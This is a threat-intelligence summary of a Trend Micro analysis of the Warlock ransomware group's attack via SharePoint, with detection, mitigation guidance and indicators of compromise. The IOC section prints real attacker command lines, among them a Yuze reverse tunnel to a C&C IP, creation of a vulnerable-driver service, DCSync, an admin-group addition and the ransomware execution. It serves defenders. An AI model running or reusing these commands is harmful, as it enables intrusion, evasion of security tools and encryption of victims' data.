Skip to content
.ca
sign in
8 mincritical

Web Shells, Tunnels, and Ransomware: Dissecting a Warlock Attack

The Warlock ransomware group (Water Manaul) has enhanced its attack chain by exploiting Microsoft SharePoint servers for initial access and deploying a sophisticated post-exploitation toolkit. The group leverages BYOVD techniques via the NSecKrnl.sys driver to disable security tools, establishes redundant C&C channels using legitimate tools like Velociraptor and Cloudflare Tunnels, and automates ransomware deployment domain-wide using Group Policy Objects (GPO).

Sens:ImmediateConf:highAnalyzed:2026-03-16reports

Authors: Maristel Policarpio, Junestherry Dela Cruz, Sarah Pearl Camiling, Jacob Santos, Don Ovid Ladores

ActorsWarlockWater Manaul
BYOVDRansomwareWarlockSharePointWater Manaul

Source:Trend Micro

IOCs · 2

Key Takeaways

  • The Warlock ransomware group (Water Manaul) exploits unpatched Microsoft SharePoint servers for initial access.
  • Attackers utilize a persistent BYOVD technique exploiting the NSecKrnl.sys driver to terminate security products at the kernel level.
  • The group's expanded toolkit includes TightVNC, Yuze, VS Code tunnels, and Cloudflare Tunnels for redundant C&C and lateral movement.
  • Ransomware deployment is automated domain-wide via Active Directory Group Policy Objects (GPO).

Affected Systems

  • Microsoft SharePoint servers
  • Windows Active Directory
  • Windows Endpoints

Vulnerabilities (CVEs)

  • Unpatched Microsoft SharePoint vulnerabilities (CVEs not explicitly named)

Attack Chain

The attack begins with the exploitation of unpatched Microsoft SharePoint servers, allowing the threat actors to spawn a Cobalt Strike beacon via DLL sideloading. Following initial access, the attackers perform credential dumping using DCSync and move laterally using tools like PsExec, TightVNC, and PSRemoting. They establish redundant C&C channels using Velociraptor, VS Code tunnels, Cloudflare Tunnels, and Yuze. Finally, they deploy a BYOVD tool (NSecKrnl.sys) to disable security products and distribute the ransomware payload (run.dll) domain-wide via Active Directory Group Policy Objects (GPO).

Detection Availability

  • YARA Rules: No
  • Sigma Rules: No
  • Snort/Suricata Rules: No
  • KQL Queries: No
  • Splunk SPL Queries: No
  • EQL Queries: No
  • Other Detection Logic: Yes
  • Platforms: Trend Micro Vision One

The article provides several hunting queries designed for Trend Micro Vision One to detect ransomware note creation, suspicious ASPX file creation, and encoded PowerShell execution.

Detection Engineering Assessment

EDR Visibility: High — The attack involves extensive process execution (w3wp.exe spawning cmd/powershell), DLL sideloading, service creation (sc create), and in-memory .NET loading, all of which are highly visible to modern EDRs. Network Visibility: Medium — While initial access and some C2 might be visible, the heavy use of encrypted tunnels (Cloudflare, VS Code, Yuze) and legitimate cloud services (Supabase, S3) blends malicious traffic with benign activity. Detection Difficulty: Hard — The attackers heavily abuse legitimate, dual-use tools (Velociraptor, VS Code, Cloudflare, rclone) and employ BYOVD to blind security products, making behavioral detection challenging without high false positive rates.

Required Log Sources

  • Windows Security Event Log (Event ID 4688, 4624)
  • PowerShell Operational Logs (Event ID 4104)
  • Sysmon (Event ID 1, 3, 11, 13)

Hunting Hypotheses

HypothesisTelemetryATT&CK StageFP Risk
Look for the IIS worker process (w3wp.exe) spawning suspicious child processes like cmd.exe, powershell.exe, or dropping executable files in C:\Temp or C:\ProgramData.Process creation logs (Event ID 4688 or Sysmon Event ID 1)Initial Access / ExecutionLow
Identify PowerShell executions containing '[Reflection.Assembly]' and 'DownloadData', indicating reflective in-memory loading of remote payloads.PowerShell Script Block Logging (Event ID 4104)Execution / Defense EvasionMedium
Monitor for the creation of new kernel driver services (sc create) pointing to user directories (e.g., C:\Users), which may indicate BYOVD staging.System Event Logs (Event ID 7045) or Process Creation (sc.exe)Defense EvasionLow

Control Gaps

  • Lack of strict driver allowlisting (Vulnerable Driver Blocklist)
  • Unrestricted outbound access for dual-use tunneling tools (Cloudflare, VS Code)

Key Behavioral Indicators

  • w3wp.exe spawning msiexec.exe or cmd.exe
  • rundll32.exe executing keymgr.dll
  • cloudflared.exe installed as a service
  • TrendSecurity.exe terminating multiple AV/EDR processes

False Positive Assessment

  • Medium

Recommendations

Immediate Mitigation

  • Patch all on-premises Microsoft SharePoint servers immediately.
  • Block known malicious domains and IPs (e.g., code.translatevv.com, 198.13.158.193).
  • Search for and remove unauthorized web shells (e.g., cproxy.aspx) and dropped binaries in C:\Temp and C:\ProgramData.

Infrastructure Hardening

  • Implement strict driver allowlisting to block vulnerable drivers like NSecKrnl.sys.
  • Restrict outbound network access for servers to prevent unauthorized tunneling (Cloudflare, VS Code, Yuze).
  • Segment administrative tools and protocols (RDP, SMB) to dedicated management networks.

User Protection

  • Enforce Multi-Factor Authentication (MFA) on all external access points.
  • Deploy EDR solutions with anti-tampering and kernel-level monitoring capabilities.

Security Awareness

  • Train SOC analysts to recognize the abuse of dual-use tools like Velociraptor, rclone, and VS Code for malicious purposes.

MITRE ATT&CK Mapping

  • T1190 - Exploit Public-Facing Application
  • T1059.001 - Command and Scripting Interpreter: PowerShell
  • T1505.003 - Server Software Component: Web Shell
  • T1068 - Exploitation for Privilege Escalation
  • T1218.011 - System Binary Proxy Execution: Rundll32
  • T1027 - Obfuscated Files or Information
  • T1562.001 - Impair Defenses: Disable or Modify Tools
  • T1620 - Reflective Code Loading
  • T1003.006 - OS Credential Dumping: DCSync
  • T1087.002 - Account Discovery: Domain Account
  • T1021.002 - Remote Services: SMB/Windows Admin Shares
  • T1021.001 - Remote Services: Remote Desktop Protocol
  • T1021.006 - Remote Services: Windows Remote Management
  • T1560.001 - Archive Collected Data: Archive via Utility
  • T1095 - Non-Application Layer Protocol
  • T1572 - Protocol Tunneling
  • T1105 - Ingress Tool Transfer
  • T1048.003 - Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted Non-C&C Protocol
  • T1486 - Data Encrypted for Impact

Additional IOCs

  • Ips:
    • 198[.]13[.]158[.]193 - Yuze C&C server IP address.
    • 127[.]0[.]0[.]1 - Localhost IP used for Cloudflare quick tunnel proxying.
  • Domains:
    • code[.]translatevv[.]com - Cobalt Strike C&C domain.
    • vdfccjpnedujhrzscjtq[.]supabase[.]co - Payload hosting domain on Supabase.
    • litter[.]catbox[.]moe - File hosting service used to host in-memory .NET payloads.
    • files[.]catbox[.]moe - File hosting service used to host malicious DLLs.
    • blnwx[.]com - Domain associated with the 198.13.158.193 VPS infrastructure.
    • vscode[.]download[.]prss[.]microsoft[.]com - Legitimate Microsoft domain abused to download VS Code CLI for tunneling.
    • www[.]tightvnc[.]com - Legitimate domain abused to download TightVNC for lateral movement.
  • Urls:
    • hxxps://vdfccjpnedujhrzscjtq[[.]]supabase[[.]]co/storage/v1/object/public/image/v4[.]msi - URL hosting the Velociraptor MSI installer.
    • hxxps://litter[[.]]catbox[[.]]moe/zqqxb3[.]txt - URL hosting an in-memory .NET payload.
    • hxxps://files[[.]]catbox[[.]]moe/wzsjlw[.]dll - URL hosting a malicious DLL payload.
    • hxxps://litter[[.]]catbox[[.]]moe/uaw2gm[.]txt - URL hosting an in-memory .NET payload.
    • hxxps://www[.]tightvnc[.]com/download/2.8.85/tightvnc-2.8.85-gpl-setup-64bit.msi - URL used to download TightVNC.
    • hxxps://vscode[.]download[.]prss[.]microsoft[.]com/dbazure/download/insider/09401e712d4ffa5e497787978fe90c1557a0092b/vscode_cli_win32_x64_cli.zip - URL used to download the VS Code CLI.
  • File Paths:
    • C:\Temp\EndProcess.exe - Utility dropped by w3wp.exe to terminate security products.
    • C:\ProgramData\vs.bat - Batch script executed by w3wp.exe to facilitate web shell deployment.
    • C:\ProgramData\cproxy.aspx - Web shell written to disk for persistence.
    • C:\Windows\PSEXEC<REDACTED>.key - Artifact indicating PsExec lateral movement.
    • C:\ProgramData\Microsoft\AppV\code.zip - Downloaded VS Code CLI archive.
    • C:\Users\[REDACTED]\.vscode\cli\tunnel-service.log - Log file for the VS Code tunnel service.
    • c:\users\[REDACTED]\NSecKrnl.sys - Path to the vulnerable driver used for BYOVD.
    • \[VICTIM-DOMAIN]\SYSVOL[VICTIM-DOMAIN]\scripts\run\run.dll - Ransomware payload staged in SYSVOL for GPO deployment.
    • \[VICTIM-DOMAIN]\SYSVOL[VICTIM-DOMAIN]\scripts\Trend\TrendSecurity.exe - BYOVD loader staged in SYSVOL for GPO deployment.
    • \[VICTIM-DC]\netlogon\run.bat - Batch script staged in NETLOGON for deployment.
    • \[VICTIM-DOMAIN]\SysVol[VICTIM-DOMAIN]\Policies{5810DB21-959D-45BD-AF4C-0228CEC3C46A}\Machine\Scripts\Startup\CentralStartup.cmd - GPO startup script used for malware deployment.
    • c:\users\public\TrendSecurity.exe - Local path for the BYOVD loader after GPO copy.
    • c:\users\public\run.dll - Local path for the ransomware DLL after GPO copy.
    • lockdatareadme.txt - Ransom note dropped on affected systems.
  • Command Lines:
    • Purpose: Download and install Velociraptor MSI payload silently. | Tools: msiexec.exe | Stage: C&C / Persistence
    • Purpose: Invoke Windows Credential Manager for credential discovery. | Tools: rundll32.exe | Stage: Credential Access | rundll32.exe keymgr.dll,KRShowKeyMgr
    • Purpose: Perform DCSync attack to retrieve user credentials. | Tools: debug.exe | Stage: Credential Access | debug.exe . hs.txt
    • Purpose: Add domain user to Domain Administrators group. | Tools: net.exe | Stage: Privilege Escalation | net localgroup Administrators "<REDACTED>\Desktop Admins" /ADD
    • Purpose: Install TightVNC silently via MSI for lateral movement. | Tools: msiexec.exe | Stage: Lateral Movement
    • Purpose: Enable PowerShell Remoting for remote administration. | Tools: powershell.exe | Stage: Lateral Movement | powershell.exe "Enable-PSRemoting -Force -SkipNetworkProfileCheck"
    • Purpose: Download VS Code CLI via PowerShell. | Tools: powershell.exe | Stage: C&C
    • Purpose: Reflective in-memory execution of .NET payload. | Tools: powershell.exe | Stage: Execution
    • Purpose: Install Cloudflared as a persistent service. | Tools: cloudflared.exe | Stage: C&C | cloudflared.exe service install <TOKEN>
    • Purpose: Run VS Code CLI in tunnel service mode. | Tools: code-insiders.exe | Stage: C&C | code-insiders.exe" --verbose --cli-data-dir ... tunnel service internal-run
    • Purpose: Execute Yuze reverse proxy. | Tools: rundll32.exe | Stage: C&C | rundll32 yuze.dll,RunYuze reverse -c 198.13.158.193:80
    • Purpose: Create kernel driver service for BYOVD. | Tools: sc.exe | Stage: Defense Evasion | sc create NSecKrnl binPath= "c:\users\[REDACTED]\NSecKrnl.sys" type=filesys
    • Purpose: Exfiltrate data to S3 bucket using renamed rclone. | Tools: TrendFileSecurityCheck.exe | Stage: Exfiltration
    • Purpose: Execute ransomware DLL via rundll32. | Tools: rundll32.exe | Stage: Impact | rundll32 c:\users\public\run.dll,RunCryptor
  • Other:
    • w3wp.exe - SharePoint worker process abused for initial access and spawning malicious child processes.
    • MsMpSrv.exe - Legitimate Microsoft Edge binary used for DLL sideloading.
    • MsEdge.dll - Malicious DLL sideloaded by MsMpSrv.exe.
    • wssocks.exe - .NET payload designed for in-memory execution.
    • yuze.dll - Yuze tunneling tool DLL.

Related